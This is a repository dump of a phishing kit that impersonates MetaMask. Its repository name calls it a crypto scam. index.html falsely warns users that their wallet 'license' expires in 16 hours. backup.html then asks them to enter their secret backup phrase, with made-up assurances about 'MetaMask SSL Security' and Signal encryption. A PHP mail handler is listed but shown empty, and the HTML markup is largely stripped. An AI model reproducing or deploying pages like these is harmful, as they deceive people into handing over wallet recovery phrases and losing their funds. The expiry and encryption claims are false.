├── backup.html ├── css ├── .gitignore ├── backup.css └── style.css ├── index.html ├── media ├── .gitignore ├── 5e6010110671f79d5c96adf9_open graph.png ├── MetaMask.svg ├── MetaMask_Fox.svg.png ├── metamask logo.png └── metamask.png └── php ├── .gitignore └── mail-handler.php /backup.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | MetaMask | Confirm your Wallet's Secret Backup Phrase 13 | 14 | 15 |
16 |
17 |
18 | 19 | MetaMask logo 20 | 21 |
22 |
23 |
24 |
25 |

Confirm your Wallet's Secret Backup Phrase (SBP).

26 |

27 | NEVER share your secret seed phrase AKA secret recovery phrase.
28 | This input is protected by MetaMask SSL Security 29 | by the same Signal encryption protocol that secures sensitive data before they leave your device. 30 |

31 |
32 |
33 |
34 | 35 |
36 |
37 | 38 |
39 |
40 | 41 | -------------------------------------------------------------------------------- /css/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /css/backup.css: -------------------------------------------------------------------------------- 1 | * { 2 | margin: 0; 3 | padding: 0; 4 | box-sizing: border-box; 5 | } 6 | 7 | html { 8 | font-family: 'Poppins', sans-serif; 9 | } 10 | 11 | body { 12 | margin: 10px 90px; 13 | } 14 | 15 | .intro-section { 16 | margin-bottom: 80px; 17 | } 18 | 19 | .intro-section img { 20 | max-width: 320px; 21 | cursor: pointer; 22 | } 23 | 24 | .form-section { 25 | display: flex; 26 | flex-direction: column; 27 | justify-content: center; 28 | align-items: center; 29 | } 30 | 31 | .form-section .form-text{ 32 | margin-bottom: 40px; 33 | } 34 | 35 | .form-section .form-text h3{ 36 | font-size: 32px; 37 | } 38 | 39 | .form-section .form-text .strong-text{ 40 | font-weight: 600; 41 | } 42 | 43 | .form-section .form-text h3, .form-section .form-text .parag-text{ 44 | margin-bottom: 20px; 45 | } 46 | 47 | .form-section .form-input textarea { 48 | width: 820px; 49 | height: 320px; 50 | font-size: 1.2em; 51 | border-radius: 10px; 52 | padding: 10px 0 0 10px; 53 | } 54 | 55 | .form-section .next-btn { 56 | margin-top: 20px; 57 | width: 120px; 58 | height: 35px; 59 | background: rgb(46, 25, 230); 60 | color: #fff; 61 | border: none; 62 | border-radius: 5px; 63 | letter-spacing: 1px; 64 | font-weight: 300; 65 | cursor: pointer; 66 | } -------------------------------------------------------------------------------- /css/style.css: -------------------------------------------------------------------------------- 1 | * { 2 | margin: 0; 3 | padding: 0; 4 | box-sizing: border-box; 5 | } 6 | 7 | html { 8 | font-family: 'Poppins', sans-serif; 9 | } 10 | 11 | body { 12 | margin: 10px 90px; 13 | } 14 | 15 | .intro-section { 16 | margin-bottom: 80px; 17 | } 18 | 19 | .intro-section img { 20 | max-width: 320px; 21 | cursor: pointer; 22 | } 23 | 24 | .form-section { 25 | display: flex; 26 | flex-direction: column; 27 | justify-content: center; 28 | align-items: center; 29 | } 30 | 31 | .form-section .form-text{ 32 | margin-bottom: 40px; 33 | } 34 | 35 | .form-section .form-text .strong-text{ 36 | font-weight: 600; 37 | } 38 | 39 | .form-section .form-text h3 { 40 | font-size: 32px; 41 | } 42 | 43 | .form-section .form-text h3, .form-section .form-text .parag-text{ 44 | margin-bottom: 20px; 45 | } 46 | 47 | .form-section .form-input div{ 48 | margin-bottom: 20px; 49 | } 50 | 51 | .form-section .form-input label { 52 | font-weight: 500; 53 | } 54 | 55 | .form-section .form-input input { 56 | width: 300px; 57 | height: 30px; 58 | outline-color: rgb(46, 25, 230); 59 | padding-left: 10px; 60 | border-radius: 10px; 61 | margin-top: 5px; 62 | } 63 | 64 | .form-section .next-btn { 65 | margin-top: 20px; 66 | width: 120px; 67 | height: 35px; 68 | background: rgb(46, 25, 230); 69 | color: #fff; 70 | border: none; 71 | border-radius: 5px; 72 | letter-spacing: 1px; 73 | font-weight: 300; 74 | cursor: pointer; 75 | } -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | MetaMask | Renew your wallet license 12 | 13 | 14 |
15 |
16 |
17 | 18 | MetaMask logo 19 | 20 |
21 |
22 |
23 |
24 |

Renew your wallet lincense if you still need it

25 |

26 | Dear MetaMasker, we would like to just quickly remind you 27 | that your 28 | Metamask wallet will expire in 16 hours. 29 |

30 |

31 | Confirm that you use your MetaMask wallet. 32 |

33 |
34 |
35 |
36 |
37 |
38 | 39 |
40 |
41 |
42 | 43 |
44 | 48 |
49 |
50 | 51 |
52 |
53 | 54 | -------------------------------------------------------------------------------- /media/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /media/5e6010110671f79d5c96adf9_open graph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AymaneLk/MetaMask-Crypto-Scam-HTML-CSS-PHP/f112d6e08ecea9169c3836d492184cfb27bc5f4a/media/5e6010110671f79d5c96adf9_open graph.png -------------------------------------------------------------------------------- /media/MetaMask.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 18 | 19 | 24 | 28 | 32 | 34 | 38 | 42 | 46 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 83 | 84 | 85 | 87 | 89 | 90 | 91 | 92 | 94 | 95 | 96 | -------------------------------------------------------------------------------- /media/MetaMask_Fox.svg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AymaneLk/MetaMask-Crypto-Scam-HTML-CSS-PHP/f112d6e08ecea9169c3836d492184cfb27bc5f4a/media/MetaMask_Fox.svg.png -------------------------------------------------------------------------------- /media/metamask logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AymaneLk/MetaMask-Crypto-Scam-HTML-CSS-PHP/f112d6e08ecea9169c3836d492184cfb27bc5f4a/media/metamask logo.png -------------------------------------------------------------------------------- /media/metamask.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AymaneLk/MetaMask-Crypto-Scam-HTML-CSS-PHP/f112d6e08ecea9169c3836d492184cfb27bc5f4a/media/metamask.png -------------------------------------------------------------------------------- /php/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /php/mail-handler.php: -------------------------------------------------------------------------------- 1 | --------------------------------------------------------------------------------